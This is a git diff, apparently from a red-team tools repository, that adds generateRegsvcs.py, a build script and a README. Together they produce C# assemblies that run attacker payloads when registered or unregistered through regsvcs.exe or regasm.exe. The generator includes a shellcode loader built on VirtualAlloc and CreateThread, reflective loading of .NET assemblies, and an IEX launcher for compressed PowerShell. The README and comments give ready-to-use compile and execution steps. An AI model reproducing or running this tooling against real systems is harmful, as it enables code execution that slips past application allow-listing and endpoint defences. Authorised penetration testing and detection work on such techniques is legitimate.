diff --git a/red-teaming/README.md b/red-teaming/README.md index ce4bd27..5adf385 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -316,6 +316,8 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt - [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML
action parameter. +- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives. + - [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques. diff --git a/red-teaming/generateMSBuildXML.py b/red-teaming/generateMSBuildXML.py index 6a4abc0..f4c298e 100644 --- a/red-teaming/generateMSBuildXML.py +++ b/red-teaming/generateMSBuildXML.py @@ -274,7 +274,7 @@ def minimize(output): def opts(argv): parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] ') - parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script or PE/EXE file.') + parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.') parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.') parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!') @@ -296,7 +296,7 @@ def main(argv): ''') if len(argv) < 2: - print('Usage: ./generateMSBuildPowershellXML.py ') + print('Usage: ./generateMSBuildXML.py ') sys.exit(-1) args = opts(argv) diff --git a/red-teaming/regsvcs/README.md b/red-teaming/regsvcs/README.md new file mode 100644 index 0000000..70482ce --- /dev/null +++ b/red-teaming/regsvcs/README.md @@ -0,0 +1,46 @@ +## Rogue .NET Assembly for Regsvcs/Regasm Code Execution + +Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs: + +### Step 1: Generate key.snk file + +``` +powershell -file build.ps1 +``` + +### Step 2: Generate source code file + +``` +python3 generateRegsvcs.py -r payload.bin > program.cs +``` + +### Step 3: Compilate library .NET Assembly + +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs +``` + +If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: + +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs +``` + + +### Step 4: Code execution via Regsvcs or Regasm: + +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll +``` + or +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll +``` + or +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll +``` + or +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll +``` diff --git a/red-teaming/regsvcs/System.Management.Automation.dll b/red-teaming/regsvcs/System.Management.Automation.dll new file mode 100644 index 0000000..b6e5f94 Binary files /dev/null and b/red-teaming/regsvcs/System.Management.Automation.dll differ diff --git a/red-teaming/regsvcs/build.ps1 b/red-teaming/regsvcs/build.ps1 new file mode 100644 index 0000000..83251b0 --- /dev/null +++ b/red-teaming/regsvcs/build.ps1 @@ -0,0 +1,5 @@ +$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' +$Content = [System.Convert]::FromBase64String($key) +Set-Content key.snk -Value $Content -Encoding Byte + +& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs diff --git a/red-teaming/regsvcs/generateRegsvcs.py b/red-teaming/regsvcs/generateRegsvcs.py new file mode 100644 index 0000000..60e8170 --- /dev/null +++ b/red-teaming/regsvcs/generateRegsvcs.py @@ -0,0 +1,360 @@ +#!/usr/bin/python3 +# +# Red-Teaming script that constructs C# code for Regsvcs code execution technique. +# +# Step 1: Generate source code file +# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs +# +# Step 2: Compilate library .NET Assembly +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs +# +# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used +# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). +# Then proper compilation command will be: +# +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs +# +# +# Step 3: Code execution via Regsvcs or Regasm: +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll +# or +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll +# or +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll +# or +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll +# +# Mariusz B. / mgeeky, +# + +import re +import os +import io +import sys +import gzip +import base64 +import string +import struct +import random +import binascii +import argparse + + +def getCompressedPayload(filePath): + out = io.BytesIO() + encoded = '' + with open(filePath, 'rb') as f: + inp = f.read() + + with gzip.GzipFile(fileobj = out, mode = 'w') as fo: + fo.write(inp) + + encoded = base64.b64encode(out.getvalue()) + + powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( + encoded.decode() + ) + return powershell + +def getSourceFileContents(payload, _format): + launchCode = '' + usings = '' + + if _format == 'exe': + + exeLaunchCode = string.Template(''' + public static void Execute() { + + string payload = "$payload2"; + byte[] decoded = System.Convert.FromBase64String(payload); + + Assembly asm = Assembly.Load(decoded); + MethodInfo method = asm.EntryPoint; + object instance = asm.CreateInstance(method.Name); + method.Invoke(instance, null); + + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + + launchCode = exeLaunchCode + + elif _format == 'raw': + + foo = str(binascii.hexlify(payload), 'ascii') + fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] + encodedPayload = ' ' + + for i in range(len(fooarr)): + if i % 16 == 0 and i > 0: + encodedPayload += '\n ' + encodedPayload += '{}, '.format(fooarr[i]) + + encodedPayload = encodedPayload.strip()[:-1] + + shellcodeLoader = string.Template(''' + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[$payloadSize] { + $payload2 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + }''').safe_substitute( + payload2 = encodedPayload, + payloadSize = len(payload) + ) + + launchCode = shellcodeLoader + + else: + usings += ''' +using System.Management.Automation; +using System.Management.Automation.Runspaces; +''' + powershellLaunchCode = string.Template(''' + public static void Execute() { + + byte[] payload = System.Convert.FromBase64String("$payload2"); + string decoded = System.Text.Encoding.UTF8.GetString(payload); + + Runspace runspace = RunspaceFactory.CreateRunspace(); + runspace.Open(); + + Pipeline pipeline = runspace.CreatePipeline(); + pipeline.Commands.AddScript(decoded); + pipeline.Invoke(); + + runspace.Close(); + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + launchCode = powershellLaunchCode + + + template = string.Template(''' +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; +$usings + +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + $launchCode + } +}''').safe_substitute( + launchCode = launchCode, + usings = usings + ) + + return template + +def detectFileIsExe(filePath, forced = False): + first1000 = [] + + with open(filePath, 'rb') as f: + first1000 = f.read()[:1000] + + if not (first1000[0] == 'M' and first1000[1] == 'Z'): + return False + + elfanew = struct.unpack(' + +''') + if len(argv) < 2: + print('Usage: ./generateRegsvcs.py ') + sys.exit(-1) + + args = opts(argv) + + _format = 'powershell' + + if args.exe: + if not detectFileIsExe(args.inputFile, args.exe): + sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') + return False + + _format = 'exe' + sys.stderr.write('[?] File recognized as PE/EXE.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + elif args.raw: + _format = 'raw' + sys.stderr.write('[?] File specified as raw Shellcode.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + else: + sys.stderr.write('[?] Powershell code given.\n') + sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n') + sys.stderr.write(' Obtain them from: .\n\n') + + if args.inputFile.endswith('.exe'): + return False + + payload = getCompressedPayload(args.inputFile) + + output = getSourceFileContents(payload, _format) + + print(output) + + management = '' + if _format == 'powershell': + management = ' /r:System.Management.Automation.dll' + + commands = ''' + +===================================== + +Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + +Step 2: Compile source code: + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs + +Step 3: Execute your payload! + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll + '''.format(management) + + if 'PROGRAMFILES(X86)' in os.environ: + commands = commands.replace('Framework', 'Framework64') + + sys.stderr.write(commands) + +if __name__ == '__main__': + main(sys.argv) diff --git a/red-teaming/regsvcs/key.snk b/red-teaming/regsvcs/key.snk new file mode 100644 index 0000000..e279a83 Binary files /dev/null and b/red-teaming/regsvcs/key.snk differ diff --git a/red-teaming/regsvcs/program.cs b/red-teaming/regsvcs/program.cs new file mode 100644 index 0000000..cf4bbd9 Binary files /dev/null and b/red-teaming/regsvcs/program.cs differ diff --git a/red-teaming/regsvcs/regsvcs.dll b/red-teaming/regsvcs/regsvcs.dll new file mode 100644 index 0000000..ab69e54 Binary files /dev/null and b/red-teaming/regsvcs/regsvcs.dll differ